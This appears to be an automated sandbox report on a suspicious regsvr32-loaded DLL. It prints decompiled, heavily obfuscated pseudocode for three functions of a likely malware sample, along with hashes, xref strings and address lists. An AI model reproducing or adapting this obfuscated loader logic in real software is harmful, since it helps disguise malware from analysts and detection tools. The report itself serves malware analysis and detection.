l<, xrefs: 10014883
0u4, xrefs: 100148F7
7, xrefs: 100148B4
S=!, xrefs: 10014BB0
Y@, xrefs: 10014944
Nj!{, xrefs: 100149CA

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Y@$ $0u4$7$FI]$Nj!{$S=!$l<
API String ID: 0-2878404270
Opcode ID: 73f9ba6150e6c90648adbe22b17654d50cd288406f3fbc10f8b2923f3172cb6e
Instruction ID: 4dd73e0163eee2dfe56aa56eff471f63ec561f62e4dc24fe7aa9183bbcf25a46
Opcode Fuzzy Hash: 73f9ba6150e6c90648adbe22b17654d50cd288406f3fbc10f8b2923f3172cb6e
Instruction Fuzzy Hash: 681223755083808FD364CF25C58AA9FBBE1FBC5758F10891DE6DA8A260D7B09989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB59 Relevance: 10.3, Strings: 8, Instructions: 262
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1000DB59(void* __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				char _t266;
				void* _t288;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				void* _t309;
				void* _t340;
				intOrPtr _t341;
				signed int* _t344;

				_push(_a28);
				_t340 = __edx;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				_t266 = E10009E7D(0);
				_v80 = _t266;
				_t341 = _t266;
				_v72 = _t266;
				_t344 =  &(( &_v180)[9]);
				_v76 = 0xb87b3f;
				_v108 = 0x492f12;
				_t309 = 0x92b0d2e;
				_v108 = _v108 >> 3;
				_v108 = _v108 + 0x7903;
				_v108 = _v108 ^ 0x00099ae5;
				_v180 = 0xfb0830;
				_v180 = _v180 | 0x40b4a9fd;
				_t299 = 0x46;
				_v180 = _v180 * 0x22;
				_v180 = _v180 + 0xffffd5c9;
				_v180 = _v180 ^ 0xa1f46943;
				_v96 = 0x15a849;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0xad4b224d;
				_v112 = 0xf97622;
				_v112 = _v112 >> 5;
				_v112 = _v112 / _t299;
				_v112 = _v112 ^ 0x000470c2;
				_v120 = 0x8505bb;
				_v120 = _v120 | 0xcda9bd00;
				_v120 = _v120 + 0x295a;
				_v120 = _v120 ^ 0xcdad0767;
				_v176 = 0xde7057;
				_v176 = _v176 | 0xe6c5f41b;
				_v176 = _v176 + 0xffff5dd0;
				_v176 = _v176 ^ 0x48fb2389;
				_v176 = _v176 ^ 0xae2a326d;
				_v100 = 0xc36f05;
				_v100 = _v100 >> 4;
				_v100 = _v100 ^ 0x00089a1e;
				_v124 = 0xbb9e91;
				_v124 = _v124 | 0x9bb339d8;
				_v124 = _v124 >> 0xb;
				_v124 = _v124 ^ 0x0010d78f;
				_v168 = 0x38f2d0;
				_v168 = _v168 >> 0xe;
				_t300 = 0x5c;
				_v168 = _v168 * 0xa;
				_v168 = _v168 | 0xeb453987;
				_v168 = _v168 ^ 0xeb47b4a8;
				_v136 = 0xe4f33d;
				_v136 = _v136 / _t300;
				_v136 = _v136 ^ 0x35a21807;
				_v136 = _v136 ^ 0x35aa3668;
				_v144 = 0x2817bd;
				_v144 = _v144 + 0xf390;
				_v144 = _v144 ^ 0xfd81766c;
				_t301 = 0x7c;
				_v144 = _v144 / _t301;
				_v144 = _v144 ^ 0x02022ada;
				_v104 = 0x23628b;
				_t302 = 0x7a;
				_v104 = _v104 / _t302;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x00051244;
				_v116 = 0x5eceb6;
				_v116 = _v116 | 0xe20138e7;
				_v116 = _v116 + 0xfffff82f;
				_v116 = _v116 ^ 0xe25f65bf;
				_v156 = 0xf57320;
				_v156 = _v156 ^ 0xbc90c40b;
				_v156 = _v156 >> 6;
				_v156 = _v156 >> 0x10;
				_v156 = _v156 ^ 0x000f70ce;
				_v84 = 0x6a0e84;
				_v84 = _v84 ^ 0xbf41dc35;
				_v84 = _v84 ^ 0xbf27781d;
				_v164 = 0x4bf7a7;
				_t303 = 0x5b;
				_v164 = _v164 / _t303;
				_t304 = 3;
				_v164 = _v164 * 0x74;
				_v164 = _v164 << 0xb;
				_v164 = _v164 ^ 0x06b8410e;
				_v172 = 0x92fa77;
				_v172 = _v172 ^ 0xe320d2ca;
				_v172 = _v172 + 0xffffc3af;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0xb1e35e7b;
				_v92 = 0xb26cbe;
				_v92 = _v92 * 0x32;
				_v92 = _v92 ^ 0x22d8e780;
				_v160 = 0xeef542;
				_v160 = _v160 + 0xffffd5e5;
				_v160 = _v160 + 0x25e6;
				_v160 = _v160 + 0xffffa173;
				_v160 = _v160 ^ 0x00e8d615;
				_v152 = 0x163eba;
				_v152 = _v152 / _t304;
				_v152 = _v152 ^ 0x55c6b4f5;
				_v152 = _v152 + 0xffff12a6;
				_v152 = _v152 ^ 0x55c9d0d5;
				_v88 = 0x255de1;
				_v88 = _v88 + 0xffff682e;
				_v88 = _v88 ^ 0x0023b649;
				_v148 = 0x1fcaa8;
				_t305 = 0x22;
				_v148 = _v148 / _t305;
				_v148 = _v148 ^ 0xac76d6f1;
				_t306 = 0x21;
				_v148 = _v148 / _t306;
				_v148 = _v148 ^ 0x053d35b6;
				_v128 = 0x665468;
				_v128 = _v128 | 0xa5a7c816;
				_v128 = _v128 + 0xe14;
				_v128 = _v128 ^ 0xa5e2aa57;
				_v140 = 0x8a4e08;
				_v140 = _v140 ^ 0x1f6912f5;
				_v140 = _v140 | 0x1bc11622;
				_v140 = _v140 << 7;
				_v140 = _v140 ^ 0xf1a48f61;
				_v132 = 0x4ef0c0;
				_v132 = _v132 ^ 0x7b5c3757;
				_v132 = _v132 << 0xa;
				_v132 = _v132 ^ 0x4b152dd8;
				do {
					while(_t309 != 0x6f9d864) {
						if(_t309 == 0x85a2402) {
							E1000B184( &_v68, _v176, 0x44, _v100, _v124);
							_push(_v104);
							_v68 = 0x44;
							_push(_v144);
							_push(_v136);
							_v60 = E10004BB4(0x100017f0, _v168);
							_t341 = E10015A47(_v116, _v156, 0x100017f0, 0x100017f0, 0, _v84, 0x100017f0, _v164, _v172,  &_v68, _v92, _a24, _v80, 0x100017f0, _v180 | _v108 | _a4, _a20, _t340, _v160, _v152);
							E1000B9D7(_v88, _v148, _v60, _v128);
							_t344 =  &(_t344[0x19]);
							_t309 = 0xe40d0b6;
							continue;
						} else {
							if(_t309 == 0x92b0d2e) {
								_t309 = 0x6f9d864;
								continue;
							} else {
								if(_t309 != 0xe40d0b6) {
									goto L12;
								} else {
									E10021D6D(_v80, _v140, _v132);
								}
							}
						}
						L6:
						return _t341;
					}
					_push(_t309);
					_t288 = E1001E8E7(_v96, _t340,  &_v80, _v112, _v120);
					_t344 =  &(_t344[4]);
					if(_t288 == 0) {
						_t309 = 0xa141c9d;
						goto L12;
					} else {
						_t309 = 0x85a2402;
						continue;
					}
					goto L6;
					L12:
				} while (_t309 != 0xa141c9d);
				goto L6;
			}

0x1000db63
0x1000db6c
0x1000db6e
0x1000db75
0x1000db7c
0x1000db83
0x1000db84
0x1000db8b
0x1000db92
0x1000db93
0x1000db94
0x1000db99
0x1000dba0
0x1000dba2
0x1000dba9
0x1000dbac
0x1000dbb6
0x1000dbbe
0x1000dbc3
0x1000dbc8
0x1000dbd0
0x1000dbd8
0x1000dbe0
0x1000dbef
0x1000dbf2
0x1000dbf6
0x1000dbfe
0x1000dc06
0x1000dc0e
0x1000dc13
0x1000dc1b
0x1000dc23
0x1000dc30
0x1000dc34
0x1000dc3c
0x1000dc44
0x1000dc4c
0x1000dc54
0x1000dc5c
0x1000dc64
0x1000dc6c
0x1000dc74
0x1000dc7c
0x1000dc84
0x1000dc8c
0x1000dc91
0x1000dc99
0x1000dca1
0x1000dca9
0x1000dcae
0x1000dcb6
0x1000dcbe
0x1000dcc8
0x1000dccb
0x1000dccf
0x1000dcd7
0x1000dcdf
0x1000dced
0x1000dcf1
0x1000dcf9
0x1000dd01
0x1000dd09
0x1000dd11
0x1000dd1f
0x1000dd24
0x1000dd2a
0x1000dd32
0x1000dd3e
0x1000dd43
0x1000dd49
0x1000dd4e
0x1000dd56
0x1000dd5e
0x1000dd66
0x1000dd6e
0x1000dd76
0x1000dd7e
0x1000dd86
0x1000dd8b
0x1000dd90
0x1000dd98
0x1000dda0
0x1000dda8
0x1000ddb0
0x1000ddbc
0x1000ddc1
0x1000ddcc
0x1000ddcf
0x1000ddd3
0x1000ddd8
0x1000dde0
0x1000dde8
0x1000ddf0
0x1000ddf8
0x1000ddfd
0x1000de05
0x1000de12
0x1000de16
0x1000de1e
0x1000de26
0x1000de2e
0x1000de36
0x1000de3e
0x1000de46
0x1000de56
0x1000de5a
0x1000de62
0x1000de6a
0x1000de72
0x1000de7a
0x1000de82
0x1000de8a
0x1000de96
0x1000de9b
0x1000dea1
0x1000dead
0x1000deb0
0x1000deb4
0x1000debc
0x1000dec4
0x1000decc
0x1000ded4
0x1000dee1
0x1000deee
0x1000def6
0x1000defe
0x1000df03
0x1000df0b
0x1000df13
0x1000df1b
0x1000df20
0x1000df28
0x1000df28
0x1000df32
0x1000df80
0x1000df85
0x1000df8e
0x1000df99
0x1000df9d
0x1000dfad
0x1000e021
0x1000e031
0x1000e036
0x1000e039
0x00000000
0x1000df34
0x1000df3a
0x1000df67
0x00000000
0x1000df3c
0x1000df42
0x00000000
0x1000df48
0x1000df54
0x1000df59
0x1000df42
0x1000df3a
0x1000df5b
0x1000df66
0x1000df66
0x1000e043
0x1000e057
0x1000e05c
0x1000e061
0x1000e06a
0x00000000
0x1000e063
0x1000e063
0x00000000
0x1000e063
0x00000000
0x1000e06f
0x1000e06f
0x00000000

Strings

.+, xrefs: 1000DBBE
hTf, xrefs: 1000DEBC
]%, xrefs: 1000DE72
Z), xrefs: 1000DC4C
D, xrefs: 1000DF8E
%, xrefs: 1000DE2E
.+, xrefs: 1000DF34
W7\{, xrefs: 1000DF13

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .+$.+$D$W7\{$Z)$hTf$%$]%
API String ID: 0-829289187
Opcode ID: 30ef89be9decb4e96d2dd60f95a9b3d304f95be9cd8cb489a1239b11a29cdddc
Instruction ID: e9fba7df2b82533ae659e1d625e0c6b0160f2d0a550d17fa0b9a3903468a7bb2
Opcode Fuzzy Hash: 30ef89be9decb4e96d2dd60f95a9b3d304f95be9cd8cb489a1239b11a29cdddc
Instruction Fuzzy Hash: DED100715083809FD364CF61C98AA1FFBE1FBC4788F508A1DF69A96260D3B58949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1000B4FC Relevance: 10.2, Strings: 8, Instructions: 222
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1000B4FC() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t200;
				signed int _t201;
				signed int _t203;
				void* _t207;
				void* _t232;
				intOrPtr _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr _t246;
				intOrPtr* _t247;
				signed int _t248;
				signed int* _t249;

				_t249 =  &_v88;
				_v16 = 0x924bbc;
				_v12 = 0xd1822;
				_t207 = 0xd53edb2;
				_v8 = 0x745efc;
				_t238 = 0;
				_v4 = 0;
				_v48 = 0xf03009;
				_v48 = _v48 ^ 0x5c7c0d57;
				_v48 = _v48 + 0x66da;
				_v48 = _v48 ^ 0x5c8da438;
				_v40 = 0xf6c621;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x000f7b7f;
				_v32 = 0x8a5660;
				_v32 = _v32 + 0xffffa458;
				_v32 = _v32 ^ 0x4f79f171;
				_v32 = _v32 ^ 0x4ff617cd;
				_v36 = 0x9cd836;
				_t239 = 0x14;
				_v36 = _v36 / _t239;
				_v36 = _v36 + 0x53d1;
				_v36 = _v36 ^ 0x000d6574;
				_v72 = 0x783573;
				_v72 = _v72 ^ 0xa3490051;
				_v72 = _v72 + 0xffffa6a5;
				_t240 = 0x57;
				_v72 = _v72 / _t240;
				_v72 = _v72 ^ 0x01ece7eb;
				_v44 = 0x37ed93;
				_v44 = _v44 >> 0xa;
				_v44 = _v44 + 0x2643;
				_v44 = _v44 ^ 0x00042c55;
				_v76 = 0xac88bf;
				_v76 = _v76 | 0x348c07ac;
				_v76 = _v76 ^ 0x3a280c59;
				_t241 = 0x13;
				_v76 = _v76 * 0xc;
				_v76 = _v76 ^ 0xae39b52d;
				_v52 = 0xe1290d;
				_v52 = _v52 + 0x8c03;
				_v52 = _v52 ^ 0xf2aa33bb;
				_v52 = _v52 ^ 0xf24e0cf7;
				_v60 = 0x1042b;
				_v60 = _v60 * 0xe;
				_v60 = _v60 + 0xffff9884;
				_v60 = _v60 ^ 0x000695eb;
				_v64 = 0x204d17;
				_v64 = _v64 | 0xbe58d171;
				_v64 = _v64 + 0xcd4c;
				_v64 = _v64 ^ 0xbe7e8a9f;
				_v84 = 0x5d74b5;
				_v84 = _v84 + 0x76ce;
				_v84 = _v84 << 2;
				_v84 = _v84 ^ 0x9688f338;
				_v84 = _v84 ^ 0x97fa93ec;
				_v88 = 0xf04bbd;
				_v88 = _v88 / _t241;
				_v88 = _v88 * 0x59;
				_t242 = 0x2f;
				_v88 = _v88 / _t242;
				_v88 = _v88 ^ 0x0019e75b;
				_v80 = 0xd89f36;
				_t243 = 0x25;
				_v80 = _v80 * 0x5b;
				_v80 = _v80 >> 2;
				_v80 = _v80 + 0xffff87e1;
				_v80 = _v80 ^ 0x1339ea98;
				_v28 = 0xc257a7;
				_v28 = _v28 / _t243;
				_v28 = _v28 ^ 0x000a7095;
				_v56 = 0x21a45a;
				_v56 = _v56 + 0xffffce01;
				_v56 = _v56 >> 2;
				_v56 = _v56 ^ 0x000c90cd;
				_v20 = 0xa50d38;
				_v20 = _v20 | 0x04338e06;
				_v20 = _v20 ^ 0x04bedb04;
				_v68 = 0x9dd66a;
				_v68 = _v68 | 0xec28012e;
				_v68 = _v68 + 0x89cb;
				_v68 = _v68 >> 9;
				_v68 = _v68 ^ 0x00763905;
				_v24 = 0x238980;
				_t244 = 0x2a;
				_t248 = _v20;
				_t206 = _v20;
				_t245 = _v20;
				_v24 = _v24 / _t244;
				_v24 = _v24 ^ 0x000493f8;
				while(1) {
					L1:
					_t232 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t207 != 0x228848c) {
								if(_t207 == 0x3870dba) {
									_t246 =  *0x10024208; // 0x49d848
									_t247 = _t246 + 0x210;
									while( *_t247 != _t232) {
										_t247 = _t247 + 2;
									}
									_t245 = _t247 + 2;
									_t207 = 0x38a63ff;
									goto L2;
								} else {
									if(_t207 == 0x38a63ff) {
										_push(_t207);
										_t201 = E100032B5(_v32, _v36, _v40, _t207, _v72);
										_t206 = _t201;
										_t249 =  &(_t249[4]);
										if(_t201 != 0) {
											_t207 = 0x4023443;
											goto L1;
										}
									} else {
										if(_t207 == 0x4023443) {
											_t203 = E1000C4EB(_v44, _v48, _t245, _t206, _v76, _v52);
											_t249 =  &(_t249[4]);
											_t248 = _t203;
											_t200 = 0xedb683d;
											_t207 =  !=  ? 0xedb683d : 0x228848c;
											_t232 = 0x5c;
											continue;
										} else {
											if(_t207 == 0x95a656d) {
												E1001A98E(_v80, _v28, _t248, _v56);
												_t207 = 0x228848c;
												while(1) {
													L1:
													_t232 = 0x5c;
													goto L2;
												}
											} else {
												if(_t207 == 0xd53edb2) {
													_t207 = 0x3870dba;
													continue;
												} else {
													if(_t207 != _t200) {
														goto L21;
													} else {
														E10011070(_t248, _v60, _v64, _v84, _v88);
														_t249 =  &(_t249[3]);
														_t238 =  !=  ? 1 : _t238;
														_t207 = 0x95a656d;
														while(1) {
															L1:
															_t232 = 0x5c;
															L2:
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E1001A98E(_v20, _v68, _t206, _v24);
							_t207 = 0x54c28a0;
							_t200 = 0xedb683d;
							_t232 = 0x5c;
							L21:
						} while (_t207 != 0x54c28a0);
						L22:
						return _t238;
					}
				}
			}

0x1000b4fc
0x1000b4ff
0x1000b509
0x1000b511
0x1000b516
0x1000b522
0x1000b524
0x1000b528
0x1000b530
0x1000b538
0x1000b540
0x1000b548
0x1000b550
0x1000b555
0x1000b55a
0x1000b562
0x1000b56a
0x1000b572
0x1000b57a
0x1000b582
0x1000b590
0x1000b595
0x1000b59b
0x1000b5a3
0x1000b5ab
0x1000b5b3
0x1000b5bb
0x1000b5c7
0x1000b5cc
0x1000b5d2
0x1000b5da
0x1000b5e2
0x1000b5e7
0x1000b5ef
0x1000b5f7
0x1000b5ff
0x1000b607
0x1000b614
0x1000b617
0x1000b61b
0x1000b623
0x1000b62b
0x1000b633
0x1000b63b
0x1000b643
0x1000b650
0x1000b654
0x1000b65c
0x1000b664
0x1000b66c
0x1000b674
0x1000b67c
0x1000b684
0x1000b68c
0x1000b694
0x1000b699
0x1000b6a1
0x1000b6a9
0x1000b6b7
0x1000b6c2
0x1000b6ca
0x1000b6cf
0x1000b6d5
0x1000b6dd
0x1000b6ea
0x1000b6ed
0x1000b6f1
0x1000b6f6
0x1000b6fe
0x1000b706
0x1000b716
0x1000b71a
0x1000b722
0x1000b72a
0x1000b732
0x1000b737
0x1000b73f
0x1000b747
0x1000b74f
0x1000b757
0x1000b75f
0x1000b767
0x1000b76f
0x1000b774
0x1000b77c
0x1000b788
0x1000b78b
0x1000b78f
0x1000b793
0x1000b797
0x1000b79b
0x1000b7a3
0x1000b7a3
0x1000b7a5
0x1000b7a6
0x1000b7a6
0x1000b7ab
0x00000000
0x1000b7ab
0x1000b7bd
0x1000b89a
0x1000b8a0
0x1000b8ab
0x1000b8a8
0x1000b8a8
0x1000b8b0
0x1000b8b3
0x00000000
0x1000b7c3
0x1000b7c9
0x1000b870
0x1000b882
0x1000b887
0x1000b889
0x1000b88e
0x1000b890
0x00000000
0x1000b890
0x1000b7cf
0x1000b7d5
0x1000b84f
0x1000b854
0x1000b857
0x1000b860
0x1000b865
0x1000b86a
0x00000000
0x1000b7d7
0x1000b7dd
0x1000b82c
0x1000b833
0x1000b7a3
0x1000b7a3
0x1000b7a5
0x00000000
0x1000b7a5
0x1000b7df
0x1000b7e5
0x1000b818
0x00000000
0x1000b7e7
0x1000b7e9
0x00000000
0x1000b7ef
0x1000b801
0x1000b808
0x1000b80e
0x1000b811
0x1000b7a3
0x1000b7a3
0x1000b7a5
0x1000b7a6
0x00000000
0x1000b7a6
0x1000b7a3
0x1000b7e9
0x1000b7e5
0x1000b7dd
0x1000b7d5
0x1000b7c9
0x00000000
0x1000b7bd
0x1000b8ca
0x1000b8d3
0x1000b8d8
0x1000b8dd
0x1000b8de
0x1000b8de
0x1000b8ea
0x1000b8f3
0x1000b8f3
0x1000b7a6

Strings

C&, xrefs: 1000B5E7
Q, xrefs: 1000B5B3
meZ, xrefs: 1000B811
), xrefs: 1000B623
s5x, xrefs: 1000B5AB
te, xrefs: 1000B5A3
W|\, xrefs: 1000B530
meZ, xrefs: 1000B7D7

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )$C&$Q$W|\$meZ$meZ$s5x$te
API String ID: 0-1857877517
Opcode ID: 19b969c2f4b03000f2f21eb1c814b5e9aed3adcc666d4dbda79f9fe899aa7d42
Instruction ID: 2e54a9d2f9c66179b9ce28ae2e06e47a368c6286e60c82cecf918bd3cd0abf3c
Opcode Fuzzy Hash: 19b969c2f4b03000f2f21eb1c814b5e9aed3adcc666d4dbda79f9fe899aa7d42
Instruction Fuzzy Hash: CBA154715087809BE398CF65C48980FFBE1FBC4798F104A1DF6869A264DBB5D949CB83

Uniqueness

Uniqueness Score: -1.00%

Function 10009133 Relevance: 9.0, Strings: 7, Instructions: 221
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10009133() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t224;
				void* _t232;
				signed int _t233;
				intOrPtr _t234;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				void* _t240;
				void* _t260;
				signed int* _t264;

				_t264 =  &_v108;
				_v28 = 0x21853;
				_v4 = 0;
				_v28 = _v28 * 0x55;
				_t260 = 0x905fe51;
				_v28 = _v28 ^ 0x80b2138e;
				_v80 = 0xbbdc8b;
				_t236 = 0x7e;
				_v80 = _v80 * 0x7c;
				_v80 = _v80 << 9;
				_v80 = _v80 ^ 0xfda6a802;
				_v40 = 0x5247e3;
				_v40 = _v40 ^ 0xeb1c3d3f;
				_v40 = _v40 ^ 0xeb4e7adc;
				_v84 = 0xe9f367;
				_v84 = _v84 >> 4;
				_v84 = _v84 >> 6;
				_v84 = _v84 ^ 0x000ffbc7;
				_v44 = 0x89a201;
				_v44 = _v44 + 0xffff6811;
				_v44 = _v44 ^ 0x008578c8;
				_v48 = 0x919043;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x000a1b59;
				_v52 = 0x51bf74;
				_v52 = _v52 >> 0xb;
				_v52 = _v52 ^ 0x0001e0db;
				_v24 = 0x2ce7e9;
				_v24 = _v24 / _t236;
				_v24 = _v24 ^ 0x00066974;
				_v100 = 0x29ee02;
				_t237 = 0x6c;
				_v100 = _v100 * 0x5b;
				_v100 = _v100 ^ 0x50b426d0;
				_v100 = _v100 * 0x15;
				_v100 = _v100 ^ 0xbcd82207;
				_v72 = 0x3814e4;
				_v72 = _v72 * 0x4f;
				_v72 = _v72 / _t237;
				_v72 = _v72 ^ 0x00249177;
				_v32 = 0x136192;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0x6c3b7e94;
				_v104 = 0xdd5f25;
				_v104 = _v104 ^ 0x5d0775a6;
				_v104 = _v104 + 0x3031;
				_v104 = _v104 << 0xf;
				_v104 = _v104 ^ 0x2d5fe0a4;
				_v76 = 0x5a8a8c;
				_v76 = _v76 | 0xfbfbbbff;
				_v76 = _v76 ^ 0xfbf48c24;
				_v36 = 0xd0a3ea;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 ^ 0x0006c3e1;
				_v68 = 0x1010d2;
				_t238 = 0x19;
				_v68 = _v68 / _t238;
				_v68 = _v68 | 0x93d8a866;
				_v68 = _v68 ^ 0x93d20a4c;
				_v96 = 0x4f392a;
				_v96 = _v96 >> 7;
				_t239 = 0x74;
				_t233 = _v4;
				_v96 = _v96 / _t239;
				_v96 = _v96 | 0xfc861e7e;
				_v96 = _v96 ^ 0xfc873c7f;
				_v20 = 0xdc499b;
				_v20 = _v20 | 0x5b136b93;
				_v20 = _v20 ^ 0x5bd55b26;
				_v108 = 0x8a79bd;
				_v108 = _v108 * 0x11;
				_v108 = _v108 | 0x46aed2ab;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0xbeda251c;
				_v88 = 0xd45c7b;
				_v88 = _v88 + 0x6c02;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x035d77af;
				_v56 = 0xdd0fcb;
				_v56 = _v56 + 0xd64;
				_v56 = _v56 ^ 0x00d7a305;
				_v60 = 0x2521ad;
				_v60 = _v60 + 0xc9c;
				_v60 = _v60 ^ 0x002d912c;
				_v64 = 0xf4bf78;
				_v64 = _v64 ^ 0xf86838cc;
				_v64 = _v64 << 7;
				_v64 = _v64 ^ 0x4e4ebde9;
				_v92 = 0x4c2cf2;
				_v92 = _v92 | 0x6e114ab7;
				_v92 = _v92 + 0xffffbdad;
				_v92 = _v92 ^ 0x20189c3f;
				_v92 = _v92 ^ 0x4e4bcb28;
				_v12 = 0x772179;
				_t167 =  &_v12; // 0x772179
				_v12 =  *_t167 * 0x6d;
				_v12 = _v12 ^ 0x32bf0e47;
				_v16 = 0xa6fab7;
				_v16 = _v16 + 0xffff210c;
				_v16 = _v16 ^ 0x00aab966;
				while(1) {
					L1:
					_t240 = 0x5c;
					while(1) {
						_t224 = 0xeb2fdd3;
						do {
							L3:
							while(_t260 != 0x3b516e) {
								if(_t260 == 0x80b82bc) {
									_t234 =  *0x10024208; // 0x49d848
									_t235 = _t234 + 0x210;
									while( *_t235 != _t240) {
										_t235 = _t235 + 2;
									}
									_t233 = _t235 + 2;
									_t260 = 0x3b516e;
									_t224 = 0xeb2fdd3;
									continue;
								} else {
									if(_t260 == 0x905fe51) {
										_t260 = 0x80b82bc;
										continue;
									} else {
										if(_t260 == 0xea54531) {
											E10003152(_v64, _v92, _v8, _v12, _v16);
										} else {
											if(_t260 != _t224) {
												goto L15;
											} else {
												_t232 = E1001462A(_v8, _t233, _v108, _v88, _v56, _v60);
												_t264 =  &(_t264[4]);
												_t260 = 0xea54531;
												_v4 = 0 | _t232 == 0x00000000;
												goto L1;
											}
										}
									}
								}
								L18:
								return _v4;
							}
							_push(_v52);
							_push(_v48);
							_push(_v44);
							E10003F09(E10004BB4(0x10001290, _v84), _v24, _v28, _v100, _v72, _v32, _v104, _v76, 0x10001290, 0, 0x10001290, _v36, _v40,  &_v8, _v80);
							_t260 =  ==  ? 0xeb2fdd3 : 0x9d13d21;
							E1000B9D7(_v68, _v96, _t225, _v20);
							_t264 =  &(_t264[0x13]);
							_t224 = 0xeb2fdd3;
							_t240 = 0x5c;
							L15:
						} while (_t260 != 0x9d13d21);
						goto L18;
					}
				}
			}

0x10009133
0x10009136
0x10009140
0x1000914f
0x10009153
0x10009158
0x10009160
0x1000916f
0x10009172
0x10009176
0x1000917b
0x10009183
0x1000918b
0x10009193
0x1000919b
0x100091a3
0x100091a8
0x100091ad
0x100091b5
0x100091bd
0x100091c5
0x100091cd
0x100091d5
0x100091da
0x100091e2
0x100091ea
0x100091ef
0x100091f7
0x10009207
0x1000920b
0x10009213
0x10009220
0x10009223
0x10009227
0x10009234
0x10009238
0x10009240
0x1000924d
0x10009259
0x1000925d
0x10009265
0x1000926d
0x10009272
0x1000927a
0x10009282
0x1000928a
0x10009292
0x10009297
0x1000929f
0x100092a7
0x100092af
0x100092b7
0x100092bf
0x100092c4
0x100092cc
0x100092d8
0x100092db
0x100092df
0x100092e7
0x100092ef
0x100092f7
0x10009309
0x1000930c
0x10009310
0x10009314
0x1000931c
0x10009324
0x1000932c
0x10009334
0x1000933c
0x10009349
0x1000934d
0x10009355
0x1000935a
0x10009362
0x1000936a
0x10009372
0x10009377
0x1000937f
0x10009387
0x1000938f
0x10009397
0x1000939f
0x100093a7
0x100093af
0x100093b7
0x100093bf
0x100093c4
0x100093cc
0x100093d4
0x100093dc
0x100093e4
0x100093ec
0x100093f4
0x100093fc
0x10009401
0x10009405
0x1000940d
0x10009415
0x1000941d
0x10009425
0x10009425
0x10009427
0x10009428
0x10009428
0x1000942d
0x00000000
0x1000942d
0x10009437
0x1000948f
0x10009495
0x100094a0
0x1000949d
0x1000949d
0x100094a5
0x100094a8
0x10009428
0x00000000
0x10009439
0x1000943f
0x10009488
0x00000000
0x10009441
0x10009447
0x10009560
0x1000944d
0x1000944f
0x00000000
0x10009455
0x1000946e
0x10009475
